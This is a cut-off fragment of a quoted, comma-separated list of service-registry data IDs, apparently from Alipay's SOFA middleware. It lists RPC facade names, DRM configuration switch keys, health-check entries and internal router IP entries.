d_result_callback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zskynet:name=com.alipay.zskynet.integration.drm.AlarmCheckDRM.appCheckMaxLine,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_100.83.100.114#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.finsnsbff:name=com.alipay.sla.businessgray.drm.BusinessGrayPolicy.globalGrayAccountRange,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.124.187.222#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.finbaservice.common.service.facade.partner.api.PartnerPropertyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.minicore.common.service.facade.build.api.MiniAppBuildFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.baymax.schedule.test.BaymaxTaskScheduleManualTest:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","HEALTHY_V2@ipromofront#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","com.alipay.kbsales.common.service.download.DownloadCenterCallbackInterface:1.0:staffBirthInfoDownloadCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antfeaturelib.common.facade.service.BizSystemService:1.0:antsecurity_uctlab@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.afsc.common.service.assistinvestigate.core.RequireInvestigateServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cfpcenter:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.xfireConnectionPerHostInMosn,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.secucommunity.open.facade.OpenSecuTenantQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.etetestcore:name=com.alipay.cif.drm.PasswordRevokeSwitch.gesturePasswordRevoked,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.graymng.common.service.facade.api.GrayPublishFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.linka:name=com.alipay.common.security.dresource.SecurityCommonDrm.xssJsonValueFilterEnable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_100.83.18.124#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_100.82.87.181#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.pkgcore.common.service.facade.PackageQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_ACWARESLIFECORE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paymentmng.service.facade.payacceptance.PaccRuleManageFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:dingjiu@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.rdf.ficc.common.loadtestableschedule.drm.LoadTestableScheduleDrm.EC_finpwm_capital_fixed_investment_sys_retry.loadTestEnabled,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.159.247.67#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.malgo.core.service.hbase.CommonHbaseRepository:1.0:monitorHbase@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securitymonicalc.common.service.facade.IndicatorParamterFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finstore.common.service.facade.supertalk.SuperTalkFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.73.164.9#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","NS_Servers_TP-TRADE-BATCH#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.openeco.quality.biz.FaultInjectService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.air.service.facade.RecService:1.0:recneptuneRecService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.punishcenter.common.service.facade.PunishStrategyService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.autoinsprod.common.insure.AutoTaobaoQueryFacadeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.scardcenter.common.service.facade.OfflinepayProjectFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mapi.gateway.invoke.webservice.SysExterfaceInvokeService:1.0:zdatabus@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.himalayas.services.crm.facade.usertask.SearchAccountFacadeService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.appxcore.common.service.facade.api.servicelibrary.ServiceLibraryQueryNgFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchcommons.common.spi.api.ArtisanComponentSpiFacade:1.0:merchant-activity-card@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.contentlib.common.service.facade.common.TestFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.fc.custcenter.service.facade.AuthorityRuleCheckFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.mappprod.common.service.facade.sales.SalesQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.decisionx.engine.common.coordinator.service.ConfigLoadService:1.0:ins_marketing@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.instfund.facade.api.InstFundTransferRuleManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.etetestcore:name=com.alipay.routeclient.DefaultRouteCoordinator.whiteListRPCLoadTest,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.amct.facade.WebIdeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.framework.core.facade.OpscloudClientSyncServiceFacade:1.0:fincoretechdss@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchishub.common.service.facade.api.EventInfoFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finance.filestore.service.FileStoreService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.creditexprod.biz.service.impl.proxy.OpenapiProxyService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.lifeprod.common.service.facade.api.lifeapp.LifeAppBaseInfoOperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.girisk.common.service.facade.api.model.BrandRiskFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.adcharge.common.service.facade.api.account.AdAccountServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.fcbuservice.common.service.integration.bumng.BumngPsUserServiceClient:1.0:antyixin@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finasmcore.common.service.facade.activity.service.DailyCashQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.etetestcore.service.api.yebplus.YebPlusTransferOutService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.15.223.132#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.charge:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.enableLoadTestIsland,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.zpaas:name=com.alipay.guardian.client.sofa.drm.GuardianDrm.checkAutoType,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.charityprod.commom.service.facade.CharityProjectGZFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ifxquote.service.facade.backstage.IfxAlipaySourceRateMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cloudinc:name=com.alipay.common.tracer.manage.TracerDrm.enableRpc2JvmDigest,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.cif.facade.UserSceneCodeService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.riskmng:name=com.alipay.riskmng.biz.crp.drm.CompositeStrategyDrmResource.subDomain,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.argo.spi.publish.CustomDeployFacade:1.0:fin.forceredeem@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.mif.common.service.facade.MerchantClassificationGzoneQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdatacontext:name=com.alipay.datacontextlib.dataswap.spi.drm.DataSwapGlobalParamDrm.putContextsTimeout,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.cscheck.service.facade.api.CheckTextRuleFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.certifymng:name=com.alipay.routeclient.DefaultRouteCoordinator.grayEnable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mrchiscore.operation.common.service.facade.api.WorkerLevelFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.bkfundbuss.common.facade.query.PriceQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openhome.facade.admin.MsgServiceMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antscheduler.facade.IConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_TP_O_PROMNG#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.wealthdecisionsys.facade.page.AlarmDomainStatisticFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.icardcenter.service.facade.api.query.CardInfoQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.69.243.42#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.qconsole.facade.FunctionBindingFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.middlewareSwitch:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.jdkSerializeBlackList,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","NS_Servers_TP-S-TRADE-BATCH#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.secuinfos.common.service.facade.api.TairSyncFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.nodejs.ConsumerService:1.0:inscommunitybff@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.ipay.imerchantsettle.common.service.facade.api.SettlePauseService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.findecision.common.service.facade.decision.DecisionService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.30.45#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.sofa.rpc.elastic.ElasticService:1.0:antlaw@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.45.75.82#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mrchmobile.common.service.facade.assistant.AssistantFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kgmng.common.service.facade.ruleinference.KnowledgeDataManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.agds.cdecision.label.facade.CustomerLabelQueryFacade:1.0@DEFAULT@cashiercloud_taobao#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.AppInvokeService:1.0:publiccore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.AppInvokeService:1.0:pcreditmng@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mfinsnsprod.biz.service.gw.community.api.user.SecuUserManagerV3:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Servers_TP_C_ESCROWPROM#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.fc.arcore.common.service.specify.facade.SpecifiedArQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","HEALTHY_V2@das4int#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","com.alipay.mobileappcommon.common.service.facade.baas.CacheLoaderFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.AppInvokeService:1.0:opencore@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","config:cn.com.antcloud.acprovisioncore.common.facade.resource.facade.computer.ComputerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.pcardsales:name=com.alipay.cif.model.cache.CifCOControlSwitch.switchCustCertifyInfo,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.finpwm:name=com.alipay.finpwm.common.dal.drm.FixedDataSyncDrmImpl.syncWhiteUserIds,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.frgcenter.common.service.facade.api.TriggerSceneRefreshServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antmembermng.common.service.facade.mtconfig.service.InAppStrategyConfigService:1.0:inAppStrategyConfigService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcloanbenefit.common.service.facade.discount.BFLoanDiscountReadFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.158.44.242#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.zdataquery.common.service.facade.hbase.FinTntComposeDepositbackHbaseQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:opensupport_sharedAntProcessCallbackImpl@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antfeaturelib.common.facade.service.DataSourceCalcService:1.0:sesameCredit_recneptune@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:scenecube@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.vouchercore.service.facade.api.voucher.VoucherFreezeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finquotationcenter.common.service.facade.api.TestQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.charge:name=com.alipay.checkroute.common.service.checkersdk.drm.SDKConfigDRM.amountCoverageSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.opscloudcore.framework.core.facade.OpscloudClientSyncServiceFacade:1.0:fraudmng@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antinvoice.biz.flow.generalInvoice.ApplyInvoiceService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.167.145.89#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipayplus.gmp.openplatform.facade.AppAuthServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.certifyocr.common.service.facade.mc.McAuditService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.mydds:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.notExistExpireTimeMs,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.voucherprod.facade.api.gray.VcpGrayFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilesecurity.common.service.api.auth.AuthFacade:1.0:mobilesecurity@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secucommunity.common.service.facade.live.api.LiveRoomFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.revtrans:name=com.alipay.cif.drm.PasswordRevokeSwitch.serverRevoked,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.poscore:name=com.alipay.poscore.common.service.integration.drm.SavedExpressSendSmsRuleResource.motoAgreementSendSMSFlagStr,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobilerelation.common.service.facade.AlipayRelationQueryCzoneFacade:1.0@DEFAULT@cashiercloud_taobao#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cstraining.common.service.facade.api.CstrainingMockQueryService:1.0.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.iprobe.common.service.facade.api.PocAutoGenAmountService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opencore.service.facade.gateway.GatewayAppFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.ptcore.common.service.facade.api.controller.ControllerModelQueryFacade:1.0:PDCORE_ANTGW2CN@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zqualitywalleetoe.common.service.facade.api.WalleExternalServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.160.159.101#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.promoguard.common.service.facade.inspection.api.PcTaskParamInfoManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zpaas.facade.api.ReleaseAppInfoQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securitysimulate.common.service.client.msgbroker.MsgBrokerListener:1.0:acmantyixin@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.walle.service.gateway.api.UnifyWalleCiFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.tbf.model.service.IReporter:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.reading.common.service.facade.game.GlobalRankFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.appstore.common.service.facade.admin.AdminPlatformCatFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.socialportal.web.task.rpc.facade.activity.SalaryBillFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.agmcenter.common.service.facade.api.ProtocolQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditmarket.service.PcreditMarketViewMarkFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.bkkycprod.common.service.facade.trust.qualifiedinvestor.service.QualifiedInvestorFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finorm.core.service.guardian.dc.DataCollectionCoreService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrmcore.common.service.facade.service.flow.RunInstanceService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.charityasset.common.service.facade.api.AssetQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securitycap.common.service.facade.adapt.WorkTaskProcessQueryService:1.0.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.common.service.facade.adaptor.cloudops.CloudopsSlsCheckFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.charge:name=com.alipay.cif.model.cache.CifCOControlSwitch.readCustProp,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.securitydata:name=com.alipay.securitydata.common.service.client.gbase.impl.GeaBaseControlResourceImpl.mriskTransFromToNamespaceConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.finfocore:name=com.alipay.checkroute.common.service.checkersdk.drm.SDKConfigDRM.doInsertCheckRate,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.kbsales.common.service.facade.bcm.BPProcessCallbackFacade:1.0:batchAuditFinishPublisher@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promocenter.common.manage.facade.api.template.SceneTemplateInstanceManageFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_S_AEICORE#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.mnotify.biz.client.client.rpc.MNotifyCallbackRPCService:1.0:zmmccore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.channelrouter.service.facade.FoutChannelQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fininfo.common.service.facade.info.InfoService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fporgassetcenter.common.service.facade.api.OrgInfMngServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cicada.mide.common.service.facade.api.oplog.OpLogFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.promocenter:name=com.alipay.promocenter.biz.daemon.drm.DiscountBizParamResource.maxBudgetDayCycleCount,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.52.216.114#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.promocore.common.manager.merchant.facade.MerchantCampConfigManageService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.tradefront.service.base.api.TradeFrontDisburseService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.erecon.common.service.facade.query.api.ErcInstFileParseQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.autoinsprod.common.gift.service.AutoGiftPkgFacadeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.caprod.service.ukey.facade.InitPasswordFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.customscenter:name=com.alipay.common.tracer.manage.TracerDrm.zdalOssDigestLogThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.insqa.facade.gift.QueryGiftContractItemFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.gfinvest.facade.api.investment.InvestMentFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.antgroup.zmxy.zmepinfocenter.common.service.facade.api.calculate.EpCalculateService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbservcore.common.service.facade.message.MessageSearchUserAndSendFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.etetestcore:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.disableSync,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.124.156.208#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.pmc.common.service.facade.appclient.process.ProcessTaskAccessor:1.0.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchdtunical.common.service.facade.DataTechConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.alcontract.common.service.facade.ContractRetrievalQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alibaba.data.process.facade.codeexectask.CodeExecTaskService:1.0:dpdataprocess@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.riskdatacenter.service.facade.quota.QuotaAppQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","DATA_ID_30.50.40.142#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.auditprod.common.service.facade.riskmanage.RiskPointSyncFacade:1.0:auditprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.barcodeprod.common.service.facade.taobao.TaobaoClientFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.amsAssistantTBaseCache.useZoneMng,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.supergw.service.facade.transaction.RecoverService:1.0:supergwext@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:basement-amiibotwa@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mnotify.biz.client.client.rpc.MNotifyPluginRPCService:1.0:fcprocess@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.publiccore.common.service.facade.recommend.LifeReportTopicFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilecodec.common.spi.service.CodeRouteService:1.0:mobilechat@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.AppInvokeService:1.0:kbservindustryprod@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.insbffweb:name=com.alipay.routeclient.DefaultRouteCoordinator.elasticRuleVersion,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.18.118.67#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.ap.acquirefront.service.facade.api.AcquireSettleService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.customerTairCache_dest.czoneSwitchMap,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finadvisorprod.common.service.facade.api.UserSearchFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ordermng.common.service.api.order.RejectReasonService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.supergw.service.facade.transaction.TransReceiverService:1.0:supergw3.d4702aqcn.alipay.net@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.csmonitor.common.service.facade.JbBroadcastService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cloudbox.facade.api.CloudboxConfigQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchstm.common.service.facade.mart.facade.AssetViewItemFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfoprod.common.service.fsc.facade.RecSolutionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securitydata.common.service.variable.facade.VariableCalculateCallbackService:1.0:riskmng@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.167.144.34#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_30.18.116.129#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.insmobile:name=com.alipay.insmobile.drm.insureddrmhandler.ignoreProductRenewalWhiteList,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.ipay.iaccorder.service.facade.api.query.AccountOrderQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antrecluse.facade.service.dp.DataPlaybackService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.payflux.spi.BizDispatchServiceFacade:1.0:mobilecodecutc@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:promodataprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.191.176#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.cschannel.common.service.facade.api.prod.mng.ServProdInstRelationService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:fpdecisionfake@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.routeclient.interfacename:dmsint#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.dwdata.common.service.facade.service.DataApplyInfoFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.instope